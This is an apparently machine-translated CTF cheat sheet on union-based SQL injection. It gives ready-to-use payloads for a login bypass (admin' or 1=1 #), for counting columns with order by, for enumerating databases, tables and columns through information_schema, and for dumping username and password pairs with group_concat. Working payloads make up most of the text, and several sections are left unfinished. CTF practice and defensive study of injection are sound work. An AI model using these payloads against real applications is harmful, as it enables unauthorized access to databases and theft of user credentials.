[CTF] SQL injection summary
1. SQL injection ideas
Field
echo
library
table
column
flag
1. Universal password login
2. After login, use joint query to inject
3. Explosion field
4. See echo
4. Explosion database
3. Explosion database table
4. Explosion table column
5. Explosion flag
The # in the input box, directly use the hackbar address bar, you need to URL encode #, that is, replace with %23
order by burst field, error to 4, there are 4-1, that is, 3 fields
1' order by 1 #
1' order by 2 #
1' order by 3 #
1' order by 4 #
Union joint query judgment echo, where to display the data, replace the command where
1' union select 1,2,3 #
3
Burst library
1' union select 1,2,version() #
VERSION
1' union select 1,2,database() #
DATABASE,DATABASE1
Explosive table
There is only one database, which saves trouble and is directly equal
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() #
Multiple databases, select one
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='DATABASE'
AAA,BBB,CCC
Column
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='AAA' #
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='BBB' #
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='CCC' #
id,username,password
Read content, burst flag
1' union select 1,2,group_concat(id,username,password) from AAA #
id,username,password
1' union select 1,2,group_concat(username,0x3a,password) from AAA#
username:password,username:password
Lite
Burst field
1' order by 1 #
1' order by 2 #
1' order by 3 #
1' order by 1 %23
1' order by 2 %23
1' order by 3 %23
See echo
1' union select 1,2,3 #
Burst database
1' union select 1,database(),version() #
DATABASE,VERSION
5. Burst database tables
There is only one database, which saves trouble and is directly equal
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() #
Multiple databases, select one
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='DATABASE'
AAA,BBB,CCC
6. Burst out the columns of the table
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='AAA' #
7. Read the content, explode the flag
Read AAA table
1' union select 1,2,group_concat(id,username,password) from AAA%23&password=1
ASCII code can be added for easy distinction
1' union select 1,2,group_concat(username,0x40,password) from AAA%23&password=1
Two, SQL injection type
Three, skills
Universal password
admin’ or 1=1 #
Common URL encoding
# | %23 |
---|---|
Commonly used ASCII code
0x3a
:
0x40 @
https://www.litefeel.com/tools/ascii.php
Four, tools
1 、 hackbar
Shortcut
Ctrl + Enter to execute
2、sqlmap
3. Script
Five, bypass
Not completed yet to be supplemented...